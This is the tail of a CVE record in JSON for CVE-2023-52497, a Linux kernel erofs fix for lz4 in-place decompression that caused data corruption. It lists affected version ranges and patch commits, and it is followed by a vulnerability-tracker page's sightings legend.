"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix lz4 inplace decompression\n\nCurrently EROFS can map another compressed buffer for inplace\ndecompression, that was used to handle the cases that some pages of\ncompressed data are actually not in-place I/O.\n\nHowever, like most simple LZ77 algorithms, LZ4 expects the compressed\ndata is arranged at the end of the decompressed buffer and it\nexplicitly uses memmove() to handle overlapping:\n __________________________________________________________\n |_ direction of decompression --\u003e ____ |_ compressed data _|\n\nAlthough EROFS arranges compressed data like this, it typically maps two\nindividual virtual buffers so the relative order is uncertain.\nPreviously, it was hardly observed since LZ4 only uses memmove() for\nshort overlapped literals and x86/arm64 memmove implementations seem to\ncompletely cover it up and they don\u0027t have this issue. Juhyung reported\nthat EROFS data corruption can be found on a new Intel x86 processor.\nAfter some analysis, it seems that recent x86 processors with the new\nFSRM feature expose this issue with \"rep movsb\".\n\nLet\u0027s strictly use the decompressed buffer for lz4 inplace\ndecompression for now. Later, as an useful improvement, we could try\nto tie up these two buffers together in the correct order."
}
],
"providerMetadata": {
"dateUpdated": "2026-05-11T19:28:27.690Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9ff2d260b25df6fe1341a79113d88fecf6bd553e"
},
{
"url": "https://git.kernel.org/stable/c/a0180e940cf1aefa7d516e20b259ad34f7a8b379"
},
{
"url": "https://git.kernel.org/stable/c/77cbc04a1a8610e303a0e0d74f2676667876a184"
},
{
"url": "https://git.kernel.org/stable/c/33bf23c9940dbd3a22aad7f0cda4c84ed5701847"
},
{
"url": "https://git.kernel.org/stable/c/f36d200a80a3ca025532ed60dd1ac21b620e14ae"
},
{
"url": "https://git.kernel.org/stable/c/bffc4cc334c5bb31ded54bc3cfd651735a3cb79e"
},
{
"url": "https://git.kernel.org/stable/c/3c12466b6b7bf1e56f9b32c366a3d83d87afb4de"
}
],
"title": "erofs: fix lz4 inplace decompression",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52497",
"datePublished": "2024-02-29T15:52:13.428Z",
"dateReserved": "2024-02-20T12:30:33.305Z",
"dateUpdated": "2026-05-11T19:28:27.690Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…